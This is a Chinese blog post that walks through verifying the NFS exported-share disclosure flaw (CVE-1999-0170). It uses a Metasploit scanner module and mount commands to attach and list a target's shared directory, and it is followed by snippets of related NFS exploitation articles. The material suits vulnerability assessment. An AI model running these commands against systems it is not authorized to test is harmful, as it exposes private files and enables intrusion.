【漏洞验证】NFS 共享信息泄露漏洞

最新推荐文章于 2024-07-21 00:09:54 发布
最新推荐文章于 2024-07-21 00:09:54 发布
阅读量1.2w 收藏 14
点赞数 2
分类专栏: 漏洞复现验证 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43486390/article/details/103988021
版权

文章目录

描述

漏洞名称:NFS Exported Share Information Disclosure
中文名称:NFS 共享信息泄露漏洞
漏洞等级:高危
CVE:CVE-1999-0170
Nessus扫描结果
在这里插入图片描述
输出共享目录和文件信息
在这里插入图片描述

验证

步骤1:msf 验证漏洞是否存在,并输出共享目录

use auxiliary/scanner/nfs/nfsmount
set rhosts 192.168.1.1(IP为目标IP,端口默认设置为111不改动)

在这里插入图片描述
步骤2:

mkdir /tmp/test                                           //新建目录
mount -t nfs 192..168.1.1:/web/uploads /tmp/test          //将目标IP的目录挂载到本地新建的目录下 
df -k                                                     //查看挂载情况
ls /tmp/test                                              //查看已经共享过来的文件

在这里插入图片描述
这时候已经得到目标机共享目录下的所有文件。

ps_x
关注
专栏目录
nfs漏洞分析
qq_57147160的博客
12-13 1398
首先nfs是一个文件共享的一个服务,然后来进行搭建一下,首先启动起来: 这样服务已将开启了,但是还没有共享的目录文件,我们需要再/etc/exports中来进行配置; 写上这一句话,*号的意思是所以ip都可以进行访问,rw就是可以写入的意思。 随后我们使用nmap进行扫描: 就可以看到nfs服务了。 我们使用showmount命令来进行查看可以访问的路径: 就可以可能到我们可以访问根目录。 随后我们使用命令mount来挂载一个镜像: 挂载完成后,我们进入/mnt目录就可以
NFS未授权访问
limb0的博客
11-20 8516
NFS未授权访问 一、漏洞介绍 NFS(Network File System)即网络文件系统,它允许网络中的计算机之间通过TCP/IP网络共享资源。在NFS的应用中,本地NFS的客户端应用可以透明地读写位于远端NFS服务器上的文件,就像访问本地文件一样。若运维人员未对文件访问进行控制,将导致本地文件可被任意读取。 二、漏洞危害 本地文件可被任意读取。 三、漏洞验证 首先执行showmount试试...
kali3、nessus 针对 Metasploitable2-Linux 渗透测试- NFS导出的共享信息披露(CVE-1999-0170)
hzwindpower的博客
01-15 1902
kali3、nessus 针对 Metasploitable2-Linux 渗透测试- NFS导出的共享信息披露(CVE-1999-0170) 1、接上一篇文章,通过nessus扫描出的漏洞 2、参考信息CVE-1999-0170 通过kali去验证漏洞,看是否有exp 3、进入模块查看 4、只需要set rhosts 192.168.105.166 5、得出结论可以看到靶机更目录下的所有文件 6、挂载nfs到kali主机,发现靶机根目录下面的所有主机 参数文章:https://blog.cs
Linux 提权-NFS 共享
最新发布
m0_73464010的博客
07-21 1058
NFS(网络文件系统)是一种在端口2049上运行的网络文件共享协议,由服务器和客户端两个组件组成。NFS服务器上创建共享目录,可以通过网络与其他Linux客户端共享文件。获得权限的用户可以将文件添加到共享中,并与有权访问该目录的其他用户共享。默认情况下,每个NFS共享都会启用功能,以防止共享文件拥有root:root身份或特殊权限(即启用后,所有共享文件都会变成身份)。但是,如果启用了功能,文件可以以root身份存在,这就容易导致权限升级。我们将在本文中展示这种情况。
linux漏洞NFS Exported Share Information Disclosure
arissa666的博客
07-05 548
NFS Exported Share Information Disclosure
NFS 共享信息泄露漏洞
09-29 1323
漏洞情况: Nessus扫描到NFS共享信息泄露漏洞 漏洞验证: 1、扫描验证,确认漏洞存在,输出共享目录。 use auxiliary/scanner/nfs/nfsmount 2、将目标IP的目录挂载到本地目录。 mount -t nfs 192.168.99.23:/usr/sap/trans /tmp/test ...
NFS 导出的共享信息披露漏洞问题解法
diaya的专栏
01-18 2455
NFS 导出的共享信息披露漏洞
CentOS7修复NFS文件共享信息泄露漏洞
bai920708的博客
12-06 578
CentOS7修复NFS文件共享信息泄露漏洞
Linux NFS共享目录配置漏洞
m0_62670778的博客
05-11 714
使用nmap扫描靶机的IP地址,可以看到靶机的2049端口开放,且使用了nfs服务。尝试查看靶机利用NFS共享的全部文件夹:看到结果是。接下来可以利用nfs漏洞实现远程ssh无密码登录。传输成功之后再次尝试使用ssh命令连接靶机。这表示将根目录下单全部文件都共享了。,其目的就是映射共享文件夹下的根目录。将靶机上的共享文件挂载到该文件上面。在攻击机上面创建一个根文件夹。命令查看所有的本地磁盘的信息。我们尝试用ssh服务连接上靶机。在挂载成功之后我们可以通过。
针对NFS的渗透测试
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
07-28 1528
NFS(Network File System)即网络文件系统,是FreeBSD支持的文件系统中的一种,它允许网络中的计算机之间通过TCP/IP网络共享资源。在NFS的应用中,本地NFS的客户端应用可以透明地读写位于远端NFS服务器上的文件,就像访问本地文件一样。如今NFS具备了防止被利用导出文件夹的功能,但遗留系统中的NFS服务配置不当,则仍可能遭到恶意攻击者的利用。 发现NFS服务 NFS...
NFS配置不当导致信息泄露
HxXh
03-08 6584
NFS(Network File System)即网络文件系统,是FreeBSD支持的文件系统中的一种,它允许网络中的计算机之间通过TCP/IP网络共享资源。在NFS的应用中,本地NFS的客户端应用可以透明地读写位于远端NFS服务器上的文件,就像访问本地文件一样。(来源百度)NFS服务的默认开放端口为2049/TCP,因此我们可以借助Nmap来针对性的进行探测。对存在NFS配置错误的主机进行扫描r...
NFS笔记
xmx9326的博客
12-03 717
NFS笔记
未授权访问漏洞
snowy_y的博客
06-23 922
未授权访问
NSF未授权访问漏洞/共享文件目录数据信息泄露
weixin_38896449的博客
02-24 6057
NSF未授权访问漏洞1、漏洞描述2、漏洞检测3、漏洞利用/验证4、漏洞修复 1、漏洞描述 Network File System(NFS),网络文件系统,是由SUN公司研制的UNIX表示层协议(presentation layer protocol),能使使用者访问网络上别处的文件就像在使用自己的计算机一样。nfs最初只支持UDP协议,在新版本中支持TCP和UDP协议,默认监听端口为2049。 2、漏洞检测 (1)使用nmap,执行命令nmap --script nfs-showmount IP,获取到
nfs文件共享漏洞
m0_52433710的博客
12-21 6240
什么是nfs NFS是基于UDP/IP协议的应用,其实现主要是采用远程过程调用RPC机制,RPC提供了一组与机器、操作系统以及低层传送协议无关的存取远程文件的操作。RPC采用了XDR的支持。XDR是一种与机器无关的数据描述编码的协议,他以独立与任意机器体系结构的格式对网上传送的数据进行编码和解码,支持在异构系统之间数据的传送。 漏洞复现 攻击机:Kali 靶机:Metasploitable2 首先利用nmap对靶机 进行扫描,扫描其开放的端口: ...
NFS不安全的配置漏洞
weixin_46564680的博客
10-13 2233
NFS不安全的配置漏洞 NFS简述: 网络文件系统(英语:Network File System,缩写作 NFS)是一种分布式文件系统,力求客户端主机可以访问服务器端文件,并且其过程与访问本地存储时一样,允许网络上的用户以类似于本地存储的方式访问共享文件夹。 NFS服务的默认开放端口为2049/TCP。 漏洞检测: NFS不安全配置漏洞检测可以通过漏洞扫描工具发现 Nessus漏洞报告详情 使用NMAP检测漏洞 使用NMAP扫描发现目标开放2049端口 查看nmap自带的和NFS相关的
ubuntu配置一个简易的NFS服务
游不快的老孙
09-19 255
安装 NFS 服务端 sudo apt install nfs-kernel-server 配置portmap vim /etc/default/portmap 添加 -i 127.0.0.1 配置/etc/exports 添加 /home/sjm/NFSshare *(rw,sync,no_root_squash) /home :共享的目录 * 所有...
4.8、漏洞利用-NSF配置漏洞与Rpcbind信息泄露
c10udz的博客
10-29 5407
NFS(network file system):网络文件系统。Linux下三大文件系统之一,采用C/S架构。允许网络中的计算机之间通过TCP/IP网络共享资源。在NFS应用中,本地NFS客户端可以透明的读写位于远端NFS服务器上的文件。NFS服务端机器:通过NFS协议将文件共享到网络上NFS客户端机器:通过网络挂载NFS共享目录到本地补充:NFS服务器主要进程1 rpc.nfsd 进程NFS 服务的主进程,主要管理客户端是否能够接入 NFS 服务器以及数据的传输。
kali linux对Metasploitable2漏洞利用,nfs获取目标密码文件 笔记
边城浪子的博客
09-19 953
NFS(Network File System)即网络文件系统,是FreeBSD支持的文件系统中的一种,它允许网络中的计算机之间通过TCP/IP网络共享资源。在NFS的应用中,本地NFS的客户端应用可以透明地读写位于远端NFS服务器上的文件,就像访问本地文件一样。 实验环境: 攻击机:kali linux ip:192.168.172.134 目标机:Metasploittable2 ip:...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值